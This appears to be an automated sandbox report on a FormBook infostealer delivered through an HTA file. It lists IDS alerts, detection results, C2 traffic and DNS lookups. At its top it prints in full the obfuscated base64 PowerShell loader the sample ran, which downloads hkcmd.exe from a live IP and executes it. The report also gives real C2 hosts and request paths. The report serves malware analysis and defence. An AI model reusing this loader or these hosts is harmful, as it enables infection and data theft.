IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline", ProcessId: 6892, ProcessName: csc.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-14T23:18:58.539439+020020507451Malware Command and Control Activity Detected192.168.2.749692192.197.113.15680TCP
                    2025-04-14T23:19:30.552431+020020507451Malware Command and Control Activity Detected192.168.2.74969713.248.169.4880TCP
                    2025-04-14T23:19:44.217178+020020507451Malware Command and Control Activity Detected192.168.2.749701209.74.80.15080TCP
                    2025-04-14T23:19:59.258737+020020507451Malware Command and Control Activity Detected192.168.2.74970538.181.35.14280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-14T23:18:14.738710+020020220501A Network Trojan was detected192.3.26.14380192.168.2.749681TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-14T23:18:14.878455+020020220511A Network Trojan was detected192.3.26.14380192.168.2.749681TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-14T23:18:58.539439+020028554651A Network Trojan was detected192.168.2.749692192.197.113.15680TCP
                    2025-04-14T23:19:30.552431+020028554651A Network Trojan was detected192.168.2.74969713.248.169.4880TCP
                    2025-04-14T23:19:44.217178+020028554651A Network Trojan was detected192.168.2.749701209.74.80.15080TCP
                    2025-04-14T23:19:59.258737+020028554651A Network Trojan was detected192.168.2.74970538.181.35.14280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-14T23:19:22.531056+020028554641A Network Trojan was detected192.168.2.74969413.248.169.4880TCP
                    2025-04-14T23:19:25.218173+020028554641A Network Trojan was detected192.168.2.74969513.248.169.4880TCP
                    2025-04-14T23:19:27.882802+020028554641A Network Trojan was detected192.168.2.74969613.248.169.4880TCP
                    2025-04-14T23:19:36.119830+020028554641A Network Trojan was detected192.168.2.749698209.74.80.15080TCP
                    2025-04-14T23:19:38.805310+020028554641A Network Trojan was detected192.168.2.749699209.74.80.15080TCP
                    2025-04-14T23:19:41.501309+020028554641A Network Trojan was detected192.168.2.749700209.74.80.15080TCP
                    2025-04-14T23:19:50.741048+020028554641A Network Trojan was detected192.168.2.74970238.181.35.14280TCP
                    2025-04-14T23:19:53.579116+020028554641A Network Trojan was detected192.168.2.74970338.181.35.14280TCP
                    2025-04-14T23:19:56.411037+020028554641A Network Trojan was detected192.168.2.74970438.181.35.14280TCP
                    2025-04-14T23:20:13.037818+020028554641A Network Trojan was detected192.168.2.749706104.21.85.15680TCP
                    2025-04-14T23:20:16.665369+020028554641A Network Trojan was detected192.168.2.749707104.21.85.15680TCP
                    2025-04-14T23:20:19.339093+020028554641A Network Trojan was detected192.168.2.749708104.21.85.15680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-14T23:19:36.119830+020028563181A Network Trojan was detected192.168.2.749698209.74.80.15080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\hkcmd[1].exeReversingLabs: Detection: 72%
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeReversingLabs: Detection: 72%
                    Multi AV Scanner detection for submitted file
                    Source: truelifewithmanmadethingsonherefor.htaVirustotal: Detection: 49%Perma Link
                    Source: truelifewithmanmadethingsonherefor.htaReversingLabs: Detection: 30%
                    Yara detected FormBook
                    Source: Yara matchFile source: 0000000E.00000002.2110369857.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2107211375.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2110518882.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1202792315.0000000005460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2111063541.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2116062584.0000000005D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1202895783.00000000073A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1223919128.000000002C7F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleNeural Call Log Analysis: 99.2%
                    Source: Binary string: sysinfo.pdb source: colorcpl.exe, 0000000B.00000003.1170525304.0000000003446000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1170443738.0000000003434000.00000004.00000020.00020000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000003.1140275755.00000000009A5000.00000004.00000001.00020000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000003.1278259003.00000000009B7000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: sysinfo.pdbGCTL source: colorcpl.exe, 0000000B.00000003.1170525304.0000000003446000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1170443738.0000000003434000.00000004.00000020.00020000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000003.1140275755.00000000009A5000.00000004.00000001.00020000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000003.1278259003.00000000009B7000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: colorcpl.pdbGCTL source: jy7dhEfPtuBr.exe, 0000000D.00000002.2114696913.000000000392C000.00000004.80000000.00040000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2111977343.000000000545C000.00000004.10000000.00040000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2107718363.00000000030C9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.1490031766.000000002A9DC000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: colorcpl.pdb source: jy7dhEfPtuBr.exe, 0000000D.00000002.2114696913.000000000392C000.00000004.80000000.00040000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2111977343.000000000545C000.00000004.10000000.00040000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2107718363.00000000030C9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.1490031766.000000002A9DC000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: hkcmd.exe, 00000006.00000002.984937213.0000000002B10000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1039105080.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968372647.000000007EB70000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q;C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.pdb source: powershell.exe, 00000003.00000002.1021362956.00000000056E1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 0000000B.00000002.1223557227.000000002C63E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1223557227.000000002C4A0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1114545597.00000000054BE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1112280718.0000000005307000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000003.1206156825.0000000004C80000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000003.1201739087.0000000004AD8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2110869515.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2110869515.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 0000000B.00000002.1223557227.000000002C63E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1223557227.000000002C4A0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1114545597.00000000054BE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1112280718.0000000005307000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 0000000E.00000003.1206156825.0000000004C80000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000003.1201739087.0000000004AD8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2110869515.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2110869515.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: hkcmd.exe, 00000006.00000002.984937213.0000000002B10000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1039105080.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968808199.0000000000648000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968808199.0000000000678000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.968372647.000000007EB70000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jy7dhEfPtuBr.exe, 0000000D.00000000.1127732632.00000000006DF000.00000002.00000001.01000000.0000000F.sdmp
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F354D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,6_2_02F354D0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D5C530 FindFirstFileW,FindNextFileW,FindClose,14_2_02D5C530
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 4x nop then xor eax, eax13_2_05D8F900
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 4x nop then pop edi13_2_05D8A016
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 4x nop then xor eax, eax14_2_02D49EC0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 4x nop then mov ebx, 00000004h14_2_04D204E8

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 192.3.26.143:80 -> 192.168.2.7:49681
                    Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 192.3.26.143:80 -> 192.168.2.7:49681
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49694 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49696 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49699 -> 209.74.80.150:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49700 -> 209.74.80.150:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49698 -> 209.74.80.150:80
                    Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49698 -> 209.74.80.150:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49697 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49697 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49692 -> 192.197.113.156:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49692 -> 192.197.113.156:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49695 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49704 -> 38.181.35.142:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49707 -> 104.21.85.156:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49702 -> 38.181.35.142:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49701 -> 209.74.80.150:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49701 -> 209.74.80.150:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49705 -> 38.181.35.142:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49705 -> 38.181.35.142:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49706 -> 104.21.85.156:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49703 -> 38.181.35.142:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49708 -> 104.21.85.156:80
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 14 Apr 2025 21:18:14 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Wed, 09 Apr 2025 09:49:32 GMTETag: "1a0600-6325562da41e3"Accept-Ranges: bytesContent-Length: 1705472Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 08 07 00 00 fa 12 00 00 00 00 00 2c 18 07 00 00 10 00 00 00 20 07 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 1a 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 90 27 00 00 00 60 08 00 00 2c 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 07 00 48 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 87 07 00 24 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 fc 06 00 00 10 00 00 00 fe 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 74 08 00 00 00 10 07 00 00 0a 00 00 00 02 07 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 60 1f 00 00 00 20 07 00 00 20 00 00 00 0c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 36 00 00 00 40 07 00 00 00 00 00 00 2c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 90 27 00 00 00 80 07 00 00 28 00 00 00 2c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 b0 07 00 00 00 00 00 00 54 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 c0 07 00 00 02 00 00 00 54 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 83 00 00 00 d0 07 00 00 84 00 00 00 56 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 2c 12 00 00 60 08 00 00 2c 12 00 00 da 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 90 1a 00 00 00 00 00 00 06 1a
                    Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                    Source: Joe Sandbox ViewASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK HKKFGL-AS-APHKKwaifongGroupLimitedHK
                    Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.26.143
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_05127A18 URLDownloadToFileW,3_2_05127A18
                    Source: global trafficHTTP traffic detected: GET /440/hkcmd.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.26.143Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /tbxt/?NN=3NLhkz&ix=Iqu27JV6RtB5rwbWGX5phE4n2DLT8oSC71HEWnCl1r6gTdDm+5MFdqapX6KFcoaemzdW+bJMUEQ6mPDpHKBT298xZqQgH4Lfi5qu+/ZqVZvF6XXxTTdWlrU0agt8zu0nuVHx3Ilwud1w HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.72422.pinkConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                    Source: global trafficHTTP traffic detected: GET /c6g4/?NN=3NLhkz&ix=RNZMSqcedGWBg2TZO3dRh8gxMl4f67yslf8Dfsx/arayUyYyOnUvY1yeRgX28wL25sy8+E+PkSfs0QcIoRMa6+Ep4Tg3cATtExcE90VheDKKwlijFeg9xfpzIDqmnkPc+WGA9QqEzPXj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.wavekeith.mediaConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                    Source: global trafficHTTP traffic detected: GET /bpdk/?ix=Qd+AbDlML76Asp7YEEUMi3jx5MAB0lZePBuu7Alv7PtIyWqe0sOmlfN5AzVKPyVHj8GaIG6tBp5tN59gjWFGxeQciM6shSLelL9WbQzpne3fhS2cyjbY6u5CBjRMOph4h3kRM9WPncft&NN=3NLhkz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lifway.lifeConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                    Source: global trafficHTTP traffic detected: GET /m2co/?NN=3NLhkz&ix=KkhKztOrouYdO6KpXdVqi4w74F2zq51iuilzw+5EZsUSRbPhfJs15SPe6okTiDbvjrFGHVzshQWoM28L+pgrT7TrEWbDpJgYtRp9N28tSgtD4xDdgHuP4RPfj9LZ7uS6d61btWswAq5C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zthzzyg.topConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                    Source: global trafficDNS traffic detected: DNS query: www.72422.pink
                    Source: global trafficDNS traffic detected: DNS query: www.credit-agricole.pics
                    Source: global trafficDNS traffic detected: DNS query: www.wavekeith.media
                    Source: global trafficDNS traffic detected: DNS query: www.lifway.life
                    Source: global trafficDNS traffic detected: DNS query: www.zthzzyg.top
                    Source: global trafficDNS traffic detected: DNS query: www.rvtapp.com
                    Source: global trafficDNS traffic detected: DNS query: www.shangaccurate.shop
